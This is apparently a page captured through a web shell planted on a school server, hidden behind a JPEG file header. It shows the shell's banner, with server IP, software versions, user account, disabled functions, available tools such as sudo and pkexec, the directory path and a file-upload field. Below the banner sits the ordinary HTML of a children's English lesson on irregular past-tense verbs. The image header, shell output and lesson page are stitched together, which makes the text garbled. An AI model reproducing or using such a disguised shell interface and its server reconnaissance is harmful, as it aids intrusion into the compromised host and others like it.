????JFIF??x?x????'
| Server IP : 79.136.114.73 / Your IP : 216.73.216.37 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old7/Html/LevelG/Category1/ |
Upload File : |
<!doctype html>
<html>
<head>
<title>Learn present and past tense and fill in the blanks</title>
<script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>
<script>
function page_preLoad()
{
shared_setDeviceTypeLevelCategoryLastLesson(Level.G, Category.No1);
shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.G, Category.No1, 22), true, true);
shared_setFooterTable('id_tblFooter', true, true, true, true, true);
var ids_headings = ['id_td_heading1'];
var ids_texts = new Array();
for (var textId = 1; textId <= 45; textId++)
{
ids_texts.push('id_td_text' + textId);
}
var ids_textBoxes = new Array();
for (var textBoxId = 1; textBoxId <= 7; textBoxId++)
{
var idTextBox = 'id_textBox' + textBoxId;
var eTextBox = document.getElementById(idTextBox);
eTextBox.value = '';
if (shared_currentDeviceType == shared_DeviceTypeAndroid)
{
eTextBox.style.border = 'solid 2px black';
}
ids_textBoxes.push(idTextBox);
}
var ids_All = ids_headings.concat(ids_texts, ids_textBoxes);
shared_adjust_fontSize_for_ids_all_devices(ids_All, 70);
var id_tables_array = ['id_table1', 'id_table2', 'id_table3'];
shared_border_collapse_for_tables_except_android(id_tables_array);
}
function page_onLoad()
{
}
function btnValidate_click()
{
var eTextBox1Value = document.getElementById('id_textBox1').value.toUpperCase();
var eTextBox2Value = document.getElementById('id_textBox2').value.toUpperCase();
var eTextBox3Value = document.getElementById('id_textBox3').value.toUpperCase();
var eTextBox4Value = document.getElementById('id_textBox4').value.toUpperCase();
var eTextBox5Value = document.getElementById('id_textBox5').value.toUpperCase();
var eTextBox6Value = document.getElementById('id_textBox6').value.toUpperCase();
var eTextBox7Value = document.getElementById('id_textBox7').value.toUpperCase();
if ((eTextBox1Value == 'LEFT') &&
(eTextBox2Value == 'WON') &&
(eTextBox3Value == 'SANG') &&
(eTextBox4Value == 'WENT') &&
(eTextBox5Value == 'WORE') &&
(eTextBox6Value == 'CUT') &&
(eTextBox7Value == 'SLEPT'))
{
shared_show_claps_animation('shared_id_div_claps_image');
}
}
function btnHome_click()
{
shared_btnHomeCategories_click('LevelG');
}
function btnPrevious_click()
{
window.location = 'LevelGCat1Lesson21.html';
}
function btnNext_click()
{
window.location = 'LevelGCat1Lesson23.html';
}
</script>
</head>
<body onload="page_onLoad()">
<div id="shared_id_div_claps_image">
</div>
<table id="id_tblMainiPadBody" border="1px" cellspacing="0" cellpadding="0">
<tr height="8%">
<td>
<div id="id_tblHeader"></div>
</td>
</tr>
<tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
<td>
<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="100%" height="100%" border="0" cellpadding="2%" cellspacing="0">
<tr height="30%">
<td style="padding-bottom:0px">
<table id="id_table1" width="100%" height="100%" border="1" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="100%" height="100%" border="0" cellpadding="5%" cellspacing="0">
<tr>
<td id="id_td_text1" width="10%"> </td>
<td width="*">
<table id="id_table2" width="100%" height="100%" border="1" cellpadding="0" cellspacing="0">
<tr>
<td id="id_td_text2" align="center" class="shared_style_blue_24px"><b>Present tense</b></td>
<td id="id_td_text3" align="center" class="shared_style_blue_24px"><b>Past tense</b></td>
</tr>
<tr>
<td id="id_td_text4" align="center" class="shared_style_black_24px">win</td>
<td id="id_td_text5" align="center" class="shared_style_black_24px">won</td>
</tr>
<tr>
<td id="id_td_text6" align="center" class="shared_style_black_24px">fight</td>
<td id="id_td_text7" align="center" class="shared_style_black_24px">fought</td>
</tr>
<tr>
<td id="id_td_text8" align="center" class="shared_style_black_24px">sing</td>
<td id="id_td_text9" align="center" class="shared_style_black_24px">sang</td>
</tr>
<tr>
<td id="id_td_text10" align="center" class="shared_style_black_24px">speak</td>
<td id="id_td_text11" align="center" class="shared_style_black_24px">spoke</td>
</tr>
<tr>
<td id="id_td_text12" align="center" class="shared_style_black_24px">wear</td>
<td id="id_td_text13" align="center" class="shared_style_black_24px">wore</td>
</tr>
<tr>
<td id="id_td_text14" align="center" class="shared_style_black_24px">become</td>
<td id="id_td_text15" align="center" class="shared_style_black_24px">became</td>
</tr>
<tr>
<td id="id_td_text16" align="center" class="shared_style_black_24px">buy</td>
<td id="id_td_text17" align="center" class="shared_style_black_24px">bought</td>
</tr>
<tr>
<td id="id_td_text18" align="center" class="shared_style_black_24px">hit</td>
<td id="id_td_text19" align="center" class="shared_style_black_24px">hit</td>
</tr>
<tr>
<td id="id_td_text20" align="center" class="shared_style_black_24px">put</td>
<td id="id_td_text21" align="center" class="shared_style_black_24px">put</td>
</tr>
<tr>
<td id="id_td_text22" align="center" class="shared_style_black_24px">cut</td>
<td id="id_td_text23" align="center" class="shared_style_black_24px">cut</td>
</tr>
</table>
</td>
<td id="id_td_text24" width="30%"> </td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
<tr height="*">
<td>
<table id="id_table3" width="100%" height="100%" border="1" cellpadding="0" cellspacing="0">
<tr height="6%">
<td id="id_td_heading1" class="shared_style_blue_24px_bold_padding_left_2_percent"><u>Fill in the blanks with past tense</u>.</td>
</tr>
<tr height="*">
<td style="padding-left:2%">
<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
<tr height="14.2%">
<td>
<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
<tr height="30%">
<td id="id_td_text25" class="shared_style_black_24px_bold" width="18%">1. The van
</td>
<td id="id_td_text26" align="center" width="15%">
<textarea id="id_textBox1" class="shared_style_blue_24px_bold" style="width:90%; text-align:center; resize:none" rows="1">
</textarea>
</td>
<td id="id_td_text27" class="shared_style_black_24px_bold_padding_left_2_percent" width="*">(leave) the school an hour back.
</td>
</tr>
</table>
</td>
</tr>
<tr height="14.2%">
<td>
<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
<tr height="30%">
<td id="id_td_text28" class="shared_style_black_24px_bold" width="15%">2. Kunal
</td>
<td id="id_td_text29" align="center" width="15%">
<textarea id="id_textBox2" class="shared_style_blue_24px_bold" style="width:90%; text-align:center; resize:none" rows="1">
</textarea>
</td>
<td id="id_td_text30" class="shared_style_black_24px_bold_padding_left_2_percent" width="*">(win) the gold medal last year.
</td>
</tr>
</table>
</td>
</tr>
<tr height="14.2%">
<td>
<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
<tr height="30%">
<td id="id_td_text31" class="shared_style_black_24px_bold" width="15%">3. Jyothi
</td>
<td id="id_td_text32" align="center" width="15%">
<textarea id="id_textBox3" class="shared_style_blue_24px_bold" style="width:90%; text-align:center; resize:none" rows="1">
</textarea>
</td>
<td id="id_td_text33" class="shared_style_black_24px_bold_padding_left_2_percent" width="*">(sing) a song yesterday.
</td>
</tr>
</table>
</td>
</tr>
<tr height="14.2%">
<td>
<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
<tr height="30%">
<td id="id_td_text34" class="shared_style_black_24px_bold" width="15%">4. Roy
</td>
<td id="id_td_text35" align="center" width="15%">
<textarea id="id_textBox4" class="shared_style_blue_24px_bold" style="width:90%; text-align:center; resize:none" rows="1">
</textarea>
</td>
<td id="id_td_text36" class="shared_style_black_24px_bold_padding_left_2_percent" width="*">(go) to Delhi last week.
</td>
</tr>
</table>
</td>
</tr>
<tr height="14.2%">
<td>
<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
<tr height="30%">
<td id="id_td_text37" class="shared_style_black_24px_bold" width="21%">5. Preetham
</td>
<td id="id_td_text38" align="center" width="15%">
<textarea id="id_textBox5" class="shared_style_blue_24px_bold" style="width:90%; text-align:center; resize:none" rows="1">
</textarea>
</td>
<td id="id_td_text39" class="shared_style_black_24px_bold_padding_left_2_percent" width="*">(wear) a red dress at party.
</td>
</tr>
</table>
</td>
</tr>
<tr height="14.2%">
<td>
<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
<tr height="30%">
<td id="id_td_text40" class="shared_style_black_24px_bold" width="13%">6. Devi
</td>
<td id="id_td_text41" align="center" width="15%">
<textarea id="id_textBox6" class="shared_style_blue_24px_bold" style="width:90%; text-align:center; resize:none" rows="1">
</textarea>
</td>
<td id="id_td_text42" class="shared_style_black_24px_bold_padding_left_2_percent" width="*">(cut) her finger yesterday.
</td>
</tr>
</table>
</td>
</tr>
<tr height="*">
<td>
<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
<tr height="30%">
<td id="id_td_text43" class="shared_style_black_24px_bold" width="8%">7. I
</td>
<td id="id_td_text44" align="center" width="15%">
<textarea id="id_textBox7" class="shared_style_blue_24px_bold" style="width:90%; text-align:center; resize:none" rows="1">
</textarea>
</td>
<td id="id_td_text45" class="shared_style_black_24px_bold_padding_left_2_percent" width="*">(sleep) early last night.
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
<tr height="8%">
<td>
<div id="id_tblFooter"></div>
</td>
</tr>
</table>
<script>
page_preLoad();
</script>
</body>
</html>